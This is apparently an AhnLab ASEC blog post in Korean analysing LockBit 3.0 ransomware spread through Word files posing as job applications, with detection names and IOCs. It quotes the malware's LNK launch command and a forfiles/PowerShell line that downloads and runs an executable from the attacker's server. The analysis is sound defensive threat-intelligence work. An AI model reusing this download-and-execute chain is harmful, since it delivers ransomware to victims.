Posted By ,

워드 문서를 통해 유포되는 LockBit 3.0 랜섬웨어

ASEC 분석팀은 9/23 공유한 <입사지원 위장 메일로 유포 중인 NSIS형태의 LockBit 3.0 랜섬웨어>가 워드 문서 형태로도 유포되는 것을 확인하였다. 정확한 유포 경로는 확인되지 않았으나, 유포 파일명으로 ‘임규민.docx’, ‘전채린.docx’ 등 사람 이름을 사용하는 것으로 보아 전과 유사하게 입사지원서를 위장하여 유포되었을 것으로 추정된다.

확인된 워드 문서 내부 word\_rels\settings.xml.rels 파일에 External 링크가 존재한다. 이로 인해 문서 파일 실행 시 hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm에 접속하여 추가 dotm 파일을 다운로드한다.

그림 1. settings.xml.rels
그림 2. 워드 문서 실행 시 URL 접속 화면

문서 파일 내부에는 매크로 사용을 유도하는 이미지가 존재한다. 다운로드 된 dlx5rc.dotm에는 VBA 매크로가 포함되어 있어 사용자가 콘텐츠 사용 버튼 클릭 시 악성 매크로가 실행된다.

그림 3. 워드 문서 내부
그림 4. 문서 속성

dotm 파일에 존재하는 VBA 매크로 코드는 다음과 같다.

그림 5. 악성 VBA 매크로 코드

코드 내부 문자열들은 난독화 되어 있으며 CLSID(72C24DD5-D70A-438B-8A42-98424B88AFB8)를 사용하는 것이 특징이다. VBA 매크로 실행 시 C:\Users\Public\ 폴더에 skeml.lnk 파일을 생성한다. 해당 링크 파일의 TargetPath는 forfiles.exe이며, rundll32.exe를 통해 실행된다. 링크 파일을 실행하는 명령어는 다음과 같다.

  • rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk

링크 파일 실행 시 파워쉘 명령어를 통해 hxxp://ppaauuaa11232[.]cc/aaa.exe에서 추가 악성 파일을 다운로드하여 C:\Users\Public\156498415616651651984561561658456.exe로 저장 및 실행한다. LNK 파일을 통해 실행되는 명령어는 다음과 같다.

  • forfiles.exe /p c:\windows\system32 /m notepad.exe /c “”cmd /c powershell/W 01 curl hxxp://ppaauuaa11232.cc/aaa.exe -o C:\Users\Public\156498415616651651984561561658456.exe;C:\Users\Public\156498415616651651984561561658456.exe”
그림 6. RAPIT 프로세스 트리

현재 다운로드 되는 156498415616651651984561561658456.exe 파일은 NSIS형태의 LockBit 3.0 랜섬웨어로 아래 글과 동일한 유형의 악성코드이다.

입사지원 위장 메일로 유포 중인 NSIS형태의 LockBit 3.0 랜섬웨어 – ASEC BLOG
ASEC 분석팀은 LockBit 2.0 랜섬웨어가 메일을 통해 유포되고 있음을 지난 2월, 6월에 걸쳐 블로그에 게시한 바 있는데, 새로운 버전의 LockBit 3.0 랜섬웨어가 유사 방식을 통해 여전히 다수 유포 중 임을 알리고자 한다. 지난 6월에는 저작권 사칭 메일로 다수 유포가 되었던 반면 최근에는 입사지원 관련으로 위장한 피싱 메일을 통해 유포 중이다. 위 메일 캡처와 같이 첨부된 압축 파일명 자체에 압축 비밀번호가 명시된 경우가 있지만, 압축 파일명에 명시하지 않고 메일 본문에 압축 비밀번호를 명시한 케이스도 확인되었다.…
그림 7. 랜섬웨어 감염 후 바탕 화면

최근 LockBit 랜섬웨어가 다양한 방식으로 유포되고 있어 사용자의 주의가 필요하다. 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용하고 출처를 알 수 없는 문서 파일 실행을 자제해야 한다.

[파일 진단]
Downloader/DOC.External (2022.09.23.03)
Downloader/XML.External (2022.09.23.03)
Downloader/XML.Generic (2022.09.24.00)
Downloader/LNK.Powershell (2022.09.23.03)
Ransomware/Win.LockBit.C5243202 (2022.09.23.03)

[행위 진단]
Malware/MDP.Download.M1197  
Execution/MDP.Powershell.M1201
Ransom/MDP.Decoy.M1171

[IOC 정보]
2d8b6275dee02ea4ed218ba2673b834e (docx)
97c07d03556ddcfc8ebfa462df546eb5 (docx)
45dfdde3df07b6ccc23b7ae6e3dc1212 (docx)
77c5fb080bf77f099c5b5f268dcf4435 (dotm)
738bee5280d512a238c3bb48c3278f63 (lnk)
7b74e4fb9a95f41d5d9b4a71a5fe40b9 (exe)
hxxp://ppaauuaa11232[.]cc/dlx5rc.dotm
hxxp://ppaauuaa11232[.]cc/aaa.exe

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,,

0 0 votes
별점 주기
Subscribe
Notify of
guest

2 댓글
Inline Feedbacks
View all comments
trackback
Amadey Bot을 이용한 LockBit 3.0 랜섬웨어 유포 중 - ASEC BLOG
1 year ago

[…] 워드 문서를 통해 유포되는 LockBit 3.0 랜섬웨어 (2022년 9월 게시) […]

0
Reply
trackback
이력서를 사칭한 워드 문서로 유포되는 LockBit 3.0 랜섬웨어 - ASEC BLOG
3 months ago

[…] 다운로드한다. 워드 문서를 이용한 유포 방식은 2022년 최초 확인되었다.[2] 또한, 문서 속성 확인 시 과거 유포하던 문서의 속성과 대부분 일치하는 […]

0
Reply